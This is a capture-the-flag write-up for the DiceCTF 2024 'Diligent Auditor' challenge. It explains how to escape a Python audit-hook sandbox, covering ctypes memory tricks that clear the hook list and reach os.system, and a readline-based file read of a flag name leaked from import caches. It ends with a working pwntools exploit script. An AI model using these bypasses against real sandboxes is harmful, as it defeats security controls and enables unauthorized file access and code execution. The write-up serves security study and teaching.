[DiceCTF Quals 2024] Diligent Auditor
Points: 281 (15 solves) Challenge Author: aplet123
I hired an auditor to secure my python interpreter!
from challenge import source
#!/usr/local/bin/python
import os
import sys
import string
mod = input("mod? ")
cod = input("cod? ")
sys.stdin.close()
if len(mod) > 16 or len(cod) > 512 or any(x not in string.ascii_lowercase for x in mod) or any(x not in string.printable for x in cod):
    print("nope")
    exit(1)
code = f"""
import sys
import os
import inspect
import {mod}
if "_posixsubprocess" in sys.modules:
    print("nope")
    os._exit(1)
for k in list(sys.modules):
    del sys.modules[k]
f = inspect.currentframe()
sys.addaudithook((lambda x: lambda *_: x(1))(os._exit))
for k in f.f_builtins:
    f.f_builtins[k] = None
for k in f.f_globals:
    if k != "f":
        f.f_globals[k] = None
for k in f.f_locals:
    f.f_locals[k] = None
del f
del k
{cod}
""".strip()
os.execv(sys.executable, [sys.executable, "-c", code])
Additionally, in the Dockerfile, we can observe that we’re running python 3.12 and that the flag has an unknown filename with the known format flag-*.txt, in the eventual working directory. The latter is usually a measure to prevent a pure file read from obtaining the flag, and to encourage arbitrary code execution as the solution. As we’ll see, however, full code execution is not needed for this challenge: it is possible to first recover the flag filename and then perform an arbitrary file read to recover its contents.
from sys import addaudithook as pain
First, let’s have a look and summarize all restrictions that this jail places upon our code.
On the outside, we just have a few sanity checks on our input to be included in the executed code. We can choose a module to be imported, but importantly, it cannot contain underscores or dots. That means that most extension modules and all submodules are already excluded, on the top level. Of course, as long as we have an importable module that eventually transitively imports our target module, there’s no problem with that. On the code itself, there’s just a minor restriction on the used character set, presumably just to play it safe and avoid any weird unicode shenanigans such as weird interpretations of an rtl override character. There are some length restrictions, but nothing too stringent to make us worry.
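To get a feel for which module names survive the outer filter, here is a minimal sketch that mirrors the check from the challenge source. The function name `is_accepted` and the two constants are mine, not part of the challenge.

```python
import string

# Limits copied from the challenge source; the names are illustrative.
MAX_MOD_LEN = 16
MAX_COD_LEN = 512


def is_accepted(mod: str, cod: str) -> bool:
    """Mirror the wrapper's input check: True if it would not print "nope"."""
    if len(mod) > MAX_MOD_LEN or len(cod) > MAX_COD_LEN:
        return False
    # Only lowercase ASCII letters: no dots, digits or underscores.
    if any(ch not in string.ascii_lowercase for ch in mod):
        return False
    # The code only has to stay within string.printable.
    return all(ch in string.printable for ch in cod)


for candidate in ("ctypes", "rlcompleter", "os.path", "_posixsubprocess"):
    print(candidate, is_accepted(candidate, "pass"))
```

Both modules used later in this writeup (ctypes and rlcompleter) pass, while submodules and underscore-prefixed extension modules are rejected by name alone.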
Then, on the inside, we first have our unrestricted import, before the pain begins. sys.modules is checked for the _posixsubprocess module having been (transitively) imported, since it contains the fork_exec function that does what it says on the tin, without any audit hooks. Then, the module cache is cleared (which could probably be done with sys.modules.clear() just fine too), before installing a killer audit hook and clearing out essentially all available variables. The audit hook does a bit of trickery to hide a reference to os._exit in a closure, where it becomes hard to touch without significant manipulation, to avoid us easily disabling it. To see what the audit hook prevents us from doing, I suggest you have a quick look at the table of audit events and wonder which of those are actually comprehensively covered ;) All variables in the builtins, globals and locals are then set to None, including the imported modules like sys or our {mod}. Observe that even if we get access to the sys module, this will not be enough to get immediate access to our import of choice, as it has been removed from the sys.modules cache at this point too.
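The closure trick is easier to see in isolation. The sketch below builds a hook of the same shape as the challenge's, but hands it a harmless stand-in (`fake_exit`, my own name) instead of os._exit, and never registers it with sys.addaudithook, so nothing actually gets killed.

```python
def make_hook(killer):
    # Same shape as the challenge's hook: the outer lambda binds `killer`
    # as `x`; the inner lambda ignores the event name and its arguments.
    return (lambda x: lambda *_: x(1))(killer)


recorded = []


def fake_exit(status):
    # Stand-in for os._exit that records the status instead of exiting.
    recorded.append(status)


hook = make_hook(fake_exit)
hook("open", ("flag.txt", "r", 0))   # any event at all triggers the killer
hook("import", ("os",))

print(recorded)
print(hook.__code__.co_freevars)
print(hook.__closure__[0].cell_contents is fake_exit)
```

The only reference to the killer function lives in the closure cell of the inner lambda, and that lambda is itself only referenced from the interpreter's internal hook list, which is why setting globals and builtins to None does not disarm it.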
print(solution.intended(ctypes))
We shall first examine the intended solution, yielding arbitrary code execution, before we move on to the unintended approach of just reading the right file.
One prominent choice of module to make is of course ctypes. It allows you to call into C functions, mess with interpreter internals, and do all-around “dangerous things”. But… with great power comes great responsibility, er, auditing. As of the time of this writing, there are no less than 16 unique audit hook events defined specifically for ctypes in the audit hook events list. That means we can’t just get the address of some object (while the builtin id function gives you the memory address, as transitively does the standard __repr__ [1], it is of course audited, with the builtins.id event), or resolve the address of a symbol (with dlsym), or much of anything else. One thing that does turn out to be possible is to obtain a pointer through ctypes.byref, which can be turned into a proper pointer after some ctypes.cast. It’s interesting to observe here that directly passing byref(py_object(())) into cast will give a null pointer, but as long as some reference is kept to either the byref input or result, we do get a proper pointer. [2] This behavior is likely related to the “reference-stealing” nature of byref.
From there, we can start calculating offsets to interesting things in interpreter memory. One of those interesting things would then be the audit hook, so that we could either mess with the closure variables of the hook to avoid the exit, overwrite the code, or remove the audit hook altogether. Conveniently enough, the audit hooks defined in python and added via sys.addaudithook [3] are stored in a python list [4] and not a C linked list, which in turn means that we can list.clear it, getting rid of all those pesky os._exit calls.
From there, all that remains is to get a handle to os, which can even be found in ctypes._os, and spawn all the shells we’d like through os.system.
As an alternative ctypes-based solution, you could observe that, while ctypes.call_function is a defined audit hook event, it does not trigger when you call ctypes.memmove, for instance. This again allows us to overwrite arbitrary interpreter memory, or, when digging deeper into the type of this object, again get some address leaks (like ctypes.pythonapi._handle for libpython or ctypes._memmove_addr for libc) and call arbitrary C functions by constructing new objects of the same type but with a different address. Like so: ctypes.memmove.__class__(addr)(arguments). [5]
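As a harmless illustration of that last construction, the sketch below rebuilds a function object from the type of ctypes.memmove, but points it at the very same address (the private ctypes._memmove_addr), so it only copies a few bytes between two buffers we own. Using a different address in the real exploit is exactly the dangerous part and is not shown here.

```python
import ctypes

src = ctypes.create_string_buffer(b"hello")   # 6 bytes, including the NUL
dst = ctypes.create_string_buffer(len(src))

# The regular, exported helper.
ctypes.memmove(dst, src, len(src))

# Same prototype, rebuilt from an integer address. Here we reuse memmove's
# own address (a private attribute, so treat its availability as an assumption).
FuncType = type(ctypes.memmove)
same_memmove = FuncType(ctypes._memmove_addr)

dst2 = ctypes.create_string_buffer(len(src))
same_memmove(dst2, src, len(src))

print(dst.value, dst2.value)
```

The rebuilt object inherits the argument and return types of the original, which is why the same call signature keeps working.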
Finally, it is worth noting that all of this ctypes magic does rely on some functions that trigger audit hooks, [6] but only during import, which in this case happens well before any hooks are installed.
And now for something completely different: back to our scheduled unintended solution.
import {mod}
Have you ever considered what goes on inside your python interpreter when you type those six innocent letters: import? Maybe you have, but have you actually looked at the source code yet? Time for a bit of a journey through the bowels of python! Feel free to skip this if it gets too long, I’ll make sure to mention the important bits we saw along the way again when we use them.
As we can verify experimentally with a quick del __builtins__.__import__, the first step in importing a module is calling that function: __import__. After a quick detour through bltinmodule.c, we end up in the aptly named import.c. There, other than dealing with some caching, package and fromlist stuff, the important call goes to import_find_and_load, which in turn (of course) emits an audit event, and hands things over to the _frozen_importlib module, which also goes by the name of importlib._bootstrap and is actually written in python.
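A less destructive way to run the same experiment is to wrap builtins.__import__ temporarily instead of deleting it. The helper below (`traced_import_names`, a name I made up) records every name that passes through __import__ while a statement executes.

```python
import builtins


def traced_import_names(statement):
    """Execute `statement` and return the names passed to __import__."""
    seen = []
    original = builtins.__import__

    def spy(name, globals=None, locals=None, fromlist=(), level=0):
        seen.append(name)
        return original(name, globals, locals, fromlist, level)

    builtins.__import__ = spy
    try:
        # A fresh globals dict still resolves __import__ via builtins.
        exec(statement, {})
    finally:
        builtins.__import__ = original
    return seen


print(traced_import_names("import json")[:1])
```

The first recorded name is the one from the import statement itself; anything after it comes from imports nested inside modules that were not loaded yet.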
Once in python land, we again check the sys.modules cache, followed by acquiring a lock to avoid threading interfering with importing. The _find_and_load_unlocked function takes over, again looks at package paths to ensure all parent modules have been imported, and starts the actual importing “logic”.
When importing, there are several knobs to tweak and things to hook. First, a ModuleSpec is needed, which can be found by any “finder” that has been registered on sys.meta_path. The responsibility of a finder is to locate the module in some form, be it a file path, an entry in a zip file or even some network location, and to return a corresponding spec, all through the find_spec classmethod. By default, sys.meta_path contains three importers:
- BuiltinImporter for (you guessed it) builtin modules.
- FrozenImporter for frozen modules. That is, modules written in python but “translated” to C so they don’t depend on importing .py files. As an example, the importlib._bootstrap module we’re now looking in has been frozen as _frozen_importlib to avoid the import system messing with itself.
- PathFinder, which lives in the adjacent module importlib._bootstrap_external and concerns itself with file system loading.
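These three finders can be poked at directly through importlib.machinery. The sketch below lists whatever is currently on sys.meta_path (your environment may have extra entries) and asks each default finder for a spec; the module names I query are just convenient examples.

```python
import importlib.machinery
import sys


def finder_name(finder):
    # The default finders are classes; third-party ones may be instances.
    return getattr(finder, "__name__", type(finder).__name__)


print([finder_name(f) for f in sys.meta_path])

# Each finder answers through the same find_spec classmethod.
builtin_spec = importlib.machinery.BuiltinImporter.find_spec("sys")
frozen_spec = importlib.machinery.FrozenImporter.find_spec("_frozen_importlib")
path_spec = importlib.machinery.PathFinder.find_spec("json")

for spec in (builtin_spec, frozen_spec, path_spec):
    print(spec.name, spec.origin)
```

A finder that does not know the module simply returns None, at which point the import machinery moves on to the next entry on sys.meta_path.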
The first two cycle back into C land and essentially follow the normal rules of extension modules. They define themselves and a module gets created. The last one has some more interesting stuff and is likely more immediately relevant, so let’s follow that rabbit.
As the docstring indicates, this looks at even more hookable things, including sys.path specifying where to look for files, and sys.path_hooks that allow further customization on how to interpret the entries thereof, such as looking in the regular file system or inside of zip files. We also see the first mention of sys.path_importer_cache here, which will turn out rather interesting later. The method itself is simple, and defers to _get_spec. That method then starts going through sys.path, querying or populating sys.path_importer_cache along the way, storing the finder produced by the appropriate sys.path_hooks entry for each entry on sys.path. Once the appropriate finder is found from that cache, it is in turn called to produce the requested spec, from the given location on sys.path. For convenience, we assume it is a FileFinder.
This FileFinder can then proceed by enumerating its directory for any files that would satisfy the requested module. Of course, it also stores all possibly relevant files in its own cache: finder._path_cache. If a file is found (be it mod.py, mod.pyc, mod.so, mod/__init__.py or something else completely), it can then put all the information together in a module spec, along with the next object in this long chain: a loader that knows how to load such a file (e.g. you can have a different Loader class for .py vs .pyc files). Of course, for FileFinder, it is also possible to tweak which kinds of loaders it has access to, although I believe this would need to be addressed at the sys.path_hooks level.
Remember where we first had importlib._bootstrap._find_and_load_unlocked ask for a spec? We finally found it now! It then does some more things to create a module object and populate it, all guided by the loader object provided by the spec, as assembled by the finder, [7] and to populate the correct entries in sys.modules and optional parent modules. For completeness, I’ll just mention that the loader drives this through the create_module and exec_module methods. These can in the simplest case just create a types.ModuleType and exec the obtained code in its namespace.
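That simplest case fits in a few lines. This is only a sketch of the idea, with a made-up helper name (`load_from_source`); a real loader also sets attributes such as __spec__ and __file__ and registers the module in sys.modules.

```python
import types


def load_from_source(name, source):
    """Roughly what create_module + exec_module boil down to."""
    module = types.ModuleType(name)                # "create_module"
    code = compile(source, f"<{name}>", "exec")
    exec(code, module.__dict__)                    # "exec_module"
    return module


demo = load_from_source("demo", "ANSWER = 41 + 1\ndef double(x):\n    return 2 * x\n")
print(demo.ANSWER, demo.double(21))
```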
From cache to history to flag
Now, during all this importing, we’ve seen quite some caching going on. Starting from the well known sys.modules, through sys.path_importer_cache, up to the _path_cache of a specific FileFinder. And of course, those last two will become quite useful to us. Since python’s working directory is on sys.path by default, sys.path_importer_cache will contain a FileFinder entry for that directory, once all caches have been populated during the first few imports. In turn, that FileFinder will have cached a directory listing in its _path_cache, including a juicy bit of information: the flag file name.
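The leak can be reproduced locally without touching the challenge. The sketch below builds a throwaway directory with a fake flag file and a dummy module (both names are hypothetical), imports the module from it, and then reads the listing back out of the finder's private _path_cache. Being a private attribute, its exact contents are an implementation detail of CPython.

```python
import importlib
import os
import sys
import tempfile


def cached_listing_after_import():
    """Import a dummy module from a temp dir; return the finder's cached listing."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical file names standing in for the challenge's layout.
        with open(os.path.join(tmp, "flag-0123456789abcdef.txt"), "w") as fh:
            fh.write("not a real flag\n")
        with open(os.path.join(tmp, "demo_auditor_mod.py"), "w") as fh:
            fh.write("VALUE = 1\n")

        sys.path.insert(0, tmp)
        try:
            importlib.import_module("demo_auditor_mod")
            # The cache is keyed by the sys.path entry itself.
            finder = sys.path_importer_cache[tmp]
            return type(finder).__name__, set(finder._path_cache)
        finally:
            # Undo every global side effect of the demo.
            sys.path.remove(tmp)
            sys.modules.pop("demo_auditor_mod", None)
            sys.path_importer_cache.pop(tmp, None)


kind, listing = cached_listing_after_import()
print(kind, sorted(listing))
```

Note that the flag file was never opened or even requested: it shows up purely because the finder listed the whole directory while looking for the module.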
Now all that stands in between us and the flag is being able to read a file, or even just the first line of the file will probably do. Oh, and getting our hands on the sys module to access those caches of course, but most usual tricks via __globals__ on methods of entries in object.__subclasses__() will work there. Annoyingly, open is also audit hooked. Less annoyingly, and even luckily, I was already aware of an extension module and function that would provide me with a file read and no audit hooks, assuming the module was already imported and available: readline. Now, to get access to that function through object.__subclasses__(), we’d need to have a class in the readline module, of which there are none. So instead, we find a module that has at least one class and imports readline for itself, so that we can find it there. Such a module luckily exists, and for instance rlcompleter will do the job. In readline, we “simply” need to call read_history_file(flag_filename) followed by a print of get_history_item(1), as history items are numbered from 1. A last hurdle was getting to print things and some weirdly behaving buffering, which I eventually got around by using sys.stdout.buffer.write followed by sys.stdout.buffer.flush.
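Both building blocks can be tried outside the jail. The sketch below recovers sys through object.__subclasses__() (using find_spec rather than the load_module method from the actual payload, which is my substitution) and reads the first line of a temporary file through the readline history functions. It assumes a python built against GNU readline; libedit-based builds expect a different history file format, and on platforms without readline the helper just returns None.

```python
import os
import sys
import tempfile

try:
    import readline  # optional extension module; absent on some builds
except ImportError:
    readline = None


def recover_sys():
    """Find the sys module without naming it, via a class's method globals."""
    for cls in object.__subclasses__():
        if cls.__name__ == "BuiltinImporter":
            return cls.find_spec.__globals__["sys"]
    return None


def first_line_via_history(path):
    """Read the first line of `path` by pretending it is a history file."""
    if readline is None:
        return None
    readline.clear_history()
    readline.read_history_file(path)
    return readline.get_history_item(1)   # history items are 1-based


with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
    fh.write("dice{not_the_real_flag}\n")
    demo_path = fh.name
try:
    leaked = first_line_via_history(demo_path)
finally:
    os.unlink(demo_path)
    if readline is not None:
        readline.clear_history()

print(recover_sys() is sys, leaked)
```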
And putting all this together, we get a fairly simple piece of exploit code, since most of the hard work was already in our heads, and resolved while reading the cpython source code :)
from pwn import remote, process
PAYLOAD = r"""
subs = os.__class__.__base__.__subclasses__()
sys=[x for x in subs if "BuiltinImporter" in x.__name__][0].load_module.__globals__['sys']
p=[x for x in sys.path_importer_cache['/app']._path_cache if "flag" in x][0]
readline=[x for x in subs if "Completer" in x.__name__][0].__init__.__globals__['readline']
readline.clear_history()
readline.read_history_file("/app/" + p)
sys.stdout.buffer.write(p.encode() + b"\n" + readline.get_history_item(1).__str__().encode() + b"\ntest\n")
sys.stdout.buffer.flush()
""".strip().replace("\n", ";")
io = remote("mc.ax", 31130)
io.sendlineafter(b"mod? ", b"rlcompleter")
io.sendlineafter(b"cod? ", PAYLOAD.encode())
io.stream()
All eventually leading up to the glorious feeling of a flagged challenge: dice{python_audit_hooks_not_exactly_secure}, stored in flag-e639626913ad08d1.txt